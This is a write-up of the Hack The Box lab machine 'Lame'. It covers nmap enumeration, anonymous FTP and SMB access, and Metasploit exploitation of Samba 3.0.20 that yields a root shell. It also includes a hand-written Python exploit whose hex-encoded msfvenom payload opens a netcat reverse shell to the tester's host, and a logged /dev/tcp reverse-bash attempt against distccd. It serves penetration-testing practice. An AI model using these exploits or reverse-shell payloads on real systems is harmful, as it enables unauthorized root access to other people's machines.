Hack The Box | Lame
- Hack The Box | Lame
- Initial Nmap TCP Scan
- Full Nmap TCP Scan
- Initial Nmap TCP Scan Output
- Full Nmap TCP Scan Output
- Nmap scan of port 3632
- Thoughts based on Nmap scans:
- FTP - 22 Enumeration
- FTP - 22 Attempting Exploitation
- SMB - 139/445 Enumeration
- SMB - 139/445 Exploitation | Samba “username map script” Command Execution
- SMB - 139/445 Exploitation Manually
- DistCC Daemon - 3632 - Attempting Exploitation
Initial Nmap TCP Scan
nmap -sC -sV -oA nmap/initial-tcp-lame 10.10.10.3 -v
Full Nmap TCP Scan
sleep 300; nmap -p- -oA nmap/full-tcp-lame 10.10.10.3 -v
Initial Nmap TCP Scan Output
Nmap scan report for 10.10.10.3
Host is up (0.076s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.36
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h03m20s, deviation: 2h49m43s, median: 3m19s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-05-25T13:06:56-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 25 10:04:14 2021 -- 1 IP address (1 host up) scanned in 58.68 seconds
Full Nmap TCP Scan Output
Nmap scan report for 10.10.10.3
Host is up (0.078s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue May 25 10:07:26 2021 -- 1 IP address (1 host up) scanned in 122.25 seconds
Since there is one extra port open, I am going to run a scan similar to the initial Nmap TCP scan to enumerate the service version and perform a script scan, but only against this single port by using the -p flag to specify a port.
Nmap scan of port 3632
nmap -sC -sV -p 3632 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.081s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
Thoughts based on Nmap scans:
FTP - 21
Going down the list of open ports, the first port we have is port 21 FTP. This port has Anonymous FTP login allowed, which means that we can use an anonymous user to access FTP file shares. The Nmap scan also shows that this FTP server is running vsftpd 2.3.4. It is always a good habit to just do a quick Google search of “vsftpd 2.3.4 exploit” or something relevant if you have a service and a version number. Looking on Google, we can see that Rapid7 has a post about vsftpd 2.3.4 having backdoor command execution which seems pretty enticing so we will definitely keep this in mind when we start exploiting things.
SSH - 22
Whenever I see SSH, this is most likely one of the services I will not look into right off the bat besides searching for a possible vulnerable version. The reason for this is we need credentials. Sure, there is a chance that we may be able to bruteforce our way in, but we still need a username at the least. The only username we could try on is the root user account but that probably won’t do us any good. This does not mean though that this port will not be looked into in the future. Let’s say for example that we enumerate FTP and find that there are credentials in there. We could start using those credentials everywhere we can to see if they are valid. Even if they are not, keep those in mind… maybe someone else used the same password?
SMB 139/445
SMB will definitely be a good port to look into to check for common misconfigurations. Are there null sessions allowed? Null sessions could lead to potential file/information disclosure which can be used to maybe SSH into the server or log into a user using FTP. Is SMB patched? There may be exploits that can be used against it similar to the blog post I wrote on the HackTheBox Legacy. Maybe we are able to read/write files in an SMB share? This could lead to potential file downloads/uploads/execution, etc. similar to FTP.
DistCC Daemon - 3632
distccd is the DistCC Daemon. distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients (More info on distccd can be found on the man page of distccd). Similar to FTP, since Nmap did displayy a version number to this service, there is another post by Rapid7 talking about command execution for the DistCC Daemon so we will also keep that in mind. Due to my lack of knowledge in the DistCC Daemon as of right now, this will probably be one of the last ports I attempt to enumerate. If it comes to that point where I need to interact with the DistCC Daemon then it will be a pretty fun learning experience.
FTP - 22 Enumeration
First, let’s go ahead and try to see if we can login as an anonymous user.
ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:bri5ee): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
And we were successfully able to login as an anonymous user! Simply typing the user as anonymous and typing any password in gained us access to the FTP share.
Let’s see if there is anything interesting in the FTP share we are in as an anonymous user.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
And… nothing. Let’s see if we can use the PUT command to put files into this FTP share. For this, I’m going to exit out of the FTP share, make a file using the touch command and then seeing if I can put that into the FTP share. Note that when putting file into an FTP with the PUT command, it will be grabbing files from the directory you were in when you connected to the FTP server.
┌──(root@kali)-[~/htb/lame]
└─# touch test_ftp_file
┌──(root@kali)-[~/htb/lame]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:bri5ee): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files
ftp> put test_ftp_file
local: test_ftp_file remote: test_ftp_file
200 PORT command successful. Consider using PASV.
553 Could not create file.
So we can’t use the PUT command. Good to note down. I do not think this would have led us anywhere important regardless. The reason for this is because let’s imagine there is an FTP server and there is also a web server being hosted on port 80. What if this web server was also hosting the FTP shares? This means we could use this PUT command to stick a reverse shell into the FTP share, navigate to that file on the web server and set up a netcat listener to catch a shell back. But since there is no web server, there isn’t really much we can do with my knowledge of FTP exploits.
FTP - 22 Attempting Exploitation
It was mentioned that this vsftpd version is vulnerable to backdoor command execution. For simplicity, I am going to see if this even works by using the vsftpd 2.3.4 Metasploit Framework module.
msfconsole
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: To save all commands executed since start up
to a file, use the makerc command
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
I opened up msfconsole, used the search command to search for vsftpd 2.3.4. Once I found the module, you can simply type use # where # represents the number correlating to what was shown on the search command. In this case, it was 0 so use 0. I typed options to see what was needed for the exploit to work which was just RHOSTS which is the remote host aka the target we are attacking. I go ahead and run the exploit command nd the exploit doesn’t work. Kind of a bummer. We can try this exploit again if for some reason it just wasn’t working at this point but let’s move on for now.
SMB - 139/445 Enumeration
To start off my enumeration of SMB, I first like to run scans. This is a really good habit to get into as scans can just run in the background while you do more manual testing. I am going to run a basic SMB enumeration using NMAP NSE scripts to scan for any potential vulnerabilities and to gather more information.
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p139,445 -oA enum_smb -T4 -v 10.10.10.3 -d --stats-every 10s
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Host script results:
| smb-enum-domains:
|_ ERROR: Couldn't get info for the domain: MSRPC call returned a fault (packet type)
| smb-enum-groups:
|_ ERROR: Couldn't enumerate groups: ERROR: No groups returned by samr_EnumDomainAliases()
| smb-enum-processes:
|_ ERROR: MSRPC call returned a fault (packet type)
| smb-enum-shares:
| account_used: <blank>
| \\10.10.10.3\ADMIN$:
| Type: STYPE_IPC
| Comment: IPC Service (lame server (Samba 3.0.20-Debian))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: <none>
| \\10.10.10.3\IPC$:
| Type: STYPE_IPC
| Comment: IPC Service (lame server (Samba 3.0.20-Debian))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| \\10.10.10.3\opt:
| Type: STYPE_DISKTREE
| Comment:
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: <none>
| \\10.10.10.3\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 1
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
| \\10.10.10.3\tmp:
| Type: STYPE_DISKTREE
| Comment: oh noes!
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
|_ Anonymous access: READ/WRITE
| smb-enum-users:
| LAME\backup (RID: 1068)
| Full name: backup
| Flags: Normal user account, Account disabled
| LAME\bin (RID: 1004)
| Full name: bin
| Flags: Normal user account, Account disabled
| LAME\bind (RID: 1210)
| Flags: Normal user account, Account disabled
| LAME\daemon (RID: 1002)
| Full name: daemon
| Flags: Normal user account, Account disabled
| LAME\dhcp (RID: 1202)
| Flags: Normal user account, Account disabled
| LAME\distccd (RID: 1222)
| Flags: Normal user account, Account disabled
| LAME\ftp (RID: 1214)
| Flags: Normal user account, Account disabled
| LAME\games (RID: 1010)
| Full name: games
| Flags: Normal user account, Account disabled
| LAME\gnats (RID: 1082)
| Full name: Gnats Bug-Reporting System (admin)
| Flags: Normal user account, Account disabled
| LAME\irc (RID: 1078)
| Full name: ircd
| Flags: Normal user account, Account disabled
| LAME\klog (RID: 1206)
| Flags: Normal user account, Account disabled
| LAME\libuuid (RID: 1200)
| Flags: Normal user account, Account disabled
| LAME\list (RID: 1076)
| Full name: Mailing List Manager
| Flags: Normal user account, Account disabled
| LAME\lp (RID: 1014)
| Full name: lp
| Flags: Normal user account, Account disabled
| LAME\mail (RID: 1016)
| Full name: mail
| Flags: Normal user account, Account disabled
| LAME\man (RID: 1012)
| Full name: man
| Flags: Normal user account, Account disabled
| LAME\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
| LAME\mysql (RID: 1218)
| Full name: MySQL Server,,,
| Flags: Normal user account, Account disabled
| LAME\news (RID: 1018)
| Full name: news
| Full name: news
| Flags: Normal user account, Account disabled
| LAME\nobody (RID: 501)
| Full name: nobody
| Flags: Normal user account, Account disabled
| LAME\postfix (RID: 1212)
| Flags: Normal user account, Account disabled
| LAME\postgres (RID: 1216)
| Full name: PostgreSQL administrator,,,
| Flags: Normal user account, Account disabled
| LAME\proftpd (RID: 1226)
| Flags: Normal user account, Account disabled
| LAME\proxy (RID: 1026)
| Full name: proxy
| Flags: Normal user account, Account disabled
| LAME\root (RID: 1000)
| Full name: root
| Flags: Normal user account, Account disabled
| LAME\service (RID: 3004)
| Full name: ,,,
| Flags: Normal user account, Account disabled
| LAME\sshd (RID: 1208)
| Flags: Normal user account, Account disabled
| LAME\sync (RID: 1008)
| Full name: sync
| Flags: Normal user account, Account disabled
| LAME\sys (RID: 1006)
| Full name: sys
| Flags: Normal user account, Account disabled
| LAME\syslog (RID: 1204)
| Flags: Normal user account, Account disabled
| LAME\telnetd (RID: 1224)
| Flags: Normal user account, Account disabled
| LAME\tomcat55 (RID: 1220)
| Flags: Normal user account, Account disabled
| LAME\user (RID: 3002)
| Full name: just a user,111,,
| Flags: Normal user account
| LAME\uucp (RID: 1020)
| Full name: uucp
| Flags: Normal user account, Account disabled
| LAME\www-data (RID: 1066)
| Full name: www-data
|_ Flags: Normal user account, Account disabled
| smb-ls: Volume \\10.10.10.3\tmp
| SIZE TIME FILENAME
| <DIR> 2021-05-25T17:51:53 .
| <DIR> 2020-10-31T06:33:58 ..
| <DIR> 2021-05-25T17:04:44 vmware-root
| 0 2021-05-25T17:05:50 5563.jsvc_up
| 1600 2021-05-25T17:04:44 vgauthsvclog.txt.0
|_
| smb-mbenum:
| Master Browser
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Print server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Server service
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Unix server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Windows NT/2000/XP/2003 server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Workstation
|_ LAME 0.0 lame server (Samba 3.0.20-Debian)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-05-25T13:50:01-04:00
|_smb-print-text: false
| smb-psexec:
|_ ERROR: Couldn't create the service on the remote machine: MSRPC call returned a fault (packet type)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
Final times for host: srtt: 75024 rttvar: 42450 to: 244824
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 140.53 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Something interesting we can see from this output is that there are two shares that we can enumerate further into due to null sessions with SMB being allowed: there is anonymous READ/WRITE access to the tmp directory and IPC$ directory. The tmp directory caches my eye the most because the comment says oh noes!. May be a rabbit hole but we will see. We can also begin searching if this SMB version which is running Samba 3.0.20-Debian is vulnerable.
Enumerating the tmp directory
We can enumerate SMB shares using smbclient which is an ftp-like client to access SMB/CIFS resources on servers.
smbclient \\\\10.10.10.3\\tmp -N
We input the IP address and the directory we want to access as well as the -N flag as this will use no password which is what anonymous users use anyways. Once we login, we can use a dir command to see the contents within the tmp directory
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue May 25 10:57:40 2021
.. DR 0 Fri Oct 30 23:33:58 2020
.ICE-unix DH 0 Tue May 25 10:04:47 2021
vmware-root DR 0 Tue May 25 10:05:15 2021
.X11-unix DH 0 Tue May 25 10:05:13 2021
.X0-lock HR 11 Tue May 25 10:05:13 2021
5563.jsvc_up R 0 Tue May 25 10:05:50 2021
vgauthsvclog.txt.0 R 1600 Tue May 25 10:04:45 2021
7282168 blocks of size 1024. 5386532 blocks available
You can grab these files and put them onto your host by using the get command within smbclient. Going through each directory and grabbing the files and looking through them did not supply any information. I’m going to see if possibly this version is vulnerable to anything by doing a Google search.
SMB - 139/445 Exploitation | Samba “username map script” Command Execution
Looking on Google by typing “Samba 3.0.20 exploit”, I found a Rapid7 post about an exploit through the “username map script” configuration option within Samba. Since this also matches our version of Samba, I am going to test out this module. According to Rapid7, the description of this exploit is the following: This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!”
There is a Metasploit Framework module already for this exploit so let’s use msfconsole again.
msfconsole
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.126.147 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Command shell session 1 opened (10.10.14.36:4444 -> 10.10.10.3:53690) at 2021-05-25 11:30:34 -0700
whoami
root
Using this Metasplot module we get a root command shell! To practice for the OSCP exam, I will be doing this manually as well.
SMB - 139/445 Exploitation Manually
Looking back at the Rapid7 post, it mentions that “by specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!” This means that all we need to do is implement some shellcode into the username field when connecting to the SMB server. A great way to do this is to utilize Python. I went ahead and wrote a Python script and added some comments to explain what is happening in this script.
#!/usr/bin/python3
#Import SMBConnection Module (uses pysmb to perform file operations with a remote SMB/CIFS server)
from smb.SMBConnection import SMBConnection
#msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.36 LPORT=1337 -f python
#This msfvenom command will output shellcode for a Unix reverse netcat calling to host 10.10.14.36 on port 1337.
#Shellcode is simply a series of bytes that represent executable machine language code. These bytes are represented in hex notation.
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x62"
buf += b"\x73\x76\x6f\x65\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31"
buf += b"\x30\x2e\x31\x34\x2e\x33\x36\x20\x31\x33\x33\x37\x20"
buf += b"\x30\x3c\x2f\x74\x6d\x70\x2f\x62\x73\x76\x6f\x65\x20"
buf += b"\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74"
buf += b"\x6d\x70\x2f\x62\x73\x76\x6f\x65\x20\x32\x3e\x26\x31"
buf += b"\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x62\x73\x76"
buf += b"\x6f\x65"
#Username supplied is gonna be the nohup command (used to tell Unix systems not to stop a command once it has started this will be useful for the shellcode which is going to run a command
#Then we concatenate the nohup command with our shellcode we want to execute. We also supply and empty password and our target_ip which is 10.10.10.3
username = "/=`nohup " + buf + "`"
password = ""
target_ip = '10.10.10.3'
#Using the SMBConnection class which requires (userID, password, client_machine_name, server_name, use_ntlm_v2 (boolean value)
#We do not need to supply actual values for client_machine_name and server_name and can set use_ntlm_v2 to false since these are not needed.
connection = SMBConnection(username, password, "Temp1", "Temp2", use_ntlm_v2 = False)
#Establish an SMB connection using .connect(target_ip, port# (445))
connection.connect(target_ip, 445)
All we need to do now is setup a netcat listener on port 1337 using nc -lvnp 1337 and run our python script by simply doing python [name_of_script].py
nc -lvnp 1337
python samba-3.0.20-exploit.py
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.3] 50439
id
uid=0(root) gid=0(root)
And again we have a root shell!
DistCC Daemon - 3632 - Attempting Exploitation
When looking into DistCC Daemon, we saw that there was an exploit posted by Rapid7 regarding a Metasploit Framework module. Let’s go ahead and try this as well.
┌──(root@kali)-[~/htb/lame]
└─# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
msf6 > search distcc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec
msf6 > use 0
msf6 exploit(unix/misc/distcc_exec) > set payload payload/cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf6 exploit(unix/misc/distcc_exec) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf6 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] 10.10.10.3:3632 - stderr: #: 97: Bad file descriptor
[*] 10.10.10.3:3632 - stderr: #: /dev/tcp/10.10.14.36/4444: No such file or directory
[*] Exploit completed, but no session was created.
And… Nothing as well. Seems like SMB was the path to get to root for this box. Overall was a pretty fun box to exploit manually!